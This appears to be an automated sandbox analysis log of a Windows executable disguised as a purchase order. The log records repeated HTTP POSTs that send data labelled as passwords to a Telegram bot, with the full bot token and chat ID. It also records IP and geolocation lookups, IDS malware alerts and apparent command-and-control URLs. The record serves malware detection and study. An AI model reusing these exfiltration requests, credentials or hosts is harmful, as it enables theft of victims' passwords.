                  Source: global trafficHTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd1f358331f29dHost: api.telegram.orgContent-Length: 581
                  Source: global trafficHTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd209fbe2647ccHost: api.telegram.orgContent-Length: 581Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd20cf8d16151bHost: api.telegram.orgContent-Length: 581Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd20fb68695da8Host: api.telegram.orgContent-Length: 581
                  Source: global trafficHTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd21311e408dc9Host: api.telegram.orgContent-Length: 581Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd216cdca9611fHost: api.telegram.orgContent-Length: 581
                  Source: global trafficHTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd21b60195c746Host: api.telegram.orgContent-Length: 581Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd2201535bf242Host: api.telegram.orgContent-Length: 581
                  Source: global trafficHTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd22651478ebb6Host: api.telegram.orgContent-Length: 581Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd22b575741c71Host: api.telegram.orgContent-Length: 581
                  Source: global trafficHTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd232ee45a716cHost: api.telegram.orgContent-Length: 581Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd23bf4fc551b0Host: api.telegram.orgContent-Length: 581
                  Source: global trafficHTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd24569962d1a7Host: api.telegram.orgContent-Length: 581Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd24e9b84a7521Host: api.telegram.orgContent-Length: 581Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd257981da6897Host: api.telegram.orgContent-Length: 581Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd261610f8ea3aHost: api.telegram.orgContent-Length: 581
                  Source: global trafficHTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd269d6eebb803Host: api.telegram.orgContent-Length: 581Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd273af9796484Host: api.telegram.orgContent-Length: 581
                  Source: global trafficHTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd27d1a9bd81efHost: api.telegram.orgContent-Length: 581Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd2a320255e51fHost: api.telegram.orgContent-Length: 581
                  Source: global trafficHTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd2caa9038df06Host: api.telegram.orgContent-Length: 581Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd2d63b3185ce7Host: api.telegram.orgContent-Length: 581
                  Source: global trafficHTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd2fc9ba88ec0fHost: api.telegram.orgContent-Length: 581Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd30609e76b5a6Host: api.telegram.orgContent-Length: 581
                  Source: global trafficHTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd31135be8a6fdHost: api.telegram.orgContent-Length: 581Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd31c275b6509aHost: api.telegram.orgContent-Length: 581
                  Source: global trafficHTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd32858bb2d8adHost: api.telegram.orgContent-Length: 581Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd334532b593f8Host: api.telegram.orgContent-Length: 581
                  Source: global trafficHTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd33cd13cbab4bHost: api.telegram.orgContent-Length: 581Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd3477b07939abHost: api.telegram.orgContent-Length: 581
                  Source: global trafficHTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd354553ed73c8Host: api.telegram.orgContent-Length: 581Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd365c0748ebc1Host: api.telegram.orgContent-Length: 581
                  Source: global trafficHTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd92e3d7cfdf0fHost: api.telegram.orgContent-Length: 581Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8de0a0b8afb2742Host: api.telegram.orgContent-Length: 581Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8fa8d1df6635287Host: api.telegram.orgContent-Length: 581Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd1daa2fe4a239Host: api.telegram.orgContent-Length: 581
                  Source: Joe Sandbox ViewIP Address: 132.226.8.169 132.226.8.169
                  Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                  Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: unknownDNS query: name: checkip.dyndns.org
                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49738 -> 132.226.8.169:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49740 -> 132.226.8.169:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49734 -> 132.226.8.169:80
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49747 -> 172.67.177.134:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49737 -> 172.67.177.134:443
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: unknownHTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.4:49736 version: TLS 1.0
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:472847%0D%0ADate%20and%20Time:%2017/12/2024%20/%2015:46:43%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20472847%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                  Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                  Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                  Source: unknownHTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd1f358331f29dHost: api.telegram.orgContent-Length: 581
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 16 Dec 2024 13:14:46 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002A33000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1778472748.0000000003D3B000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4165610770.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1778472748.0000000003D3B000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002971000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4165610770.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1778472748.0000000003D3B000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002971000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4165610770.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002971000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1778472748.0000000003D3B000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4165610770.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4166570008.0000000000B36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4177864706.00000000061AB000.00000004.00000020.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4167292063.0000000000BEF000.00000004.00000020.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4166570008.0000000000B36000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.4.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4177387207.0000000006110000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?2de8b59c7a8c8
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4177387207.0000000006110000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?7bc44137868e4
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4177387207.0000000006110000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?92b2c01ab67e9
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4177387207.0000000006110000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?b9539a5e31719
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4177387207.0000000006110000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?e0919bc1731d3
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4167292063.0000000000BEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabK
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1777399011.0000000002B81000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002971000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
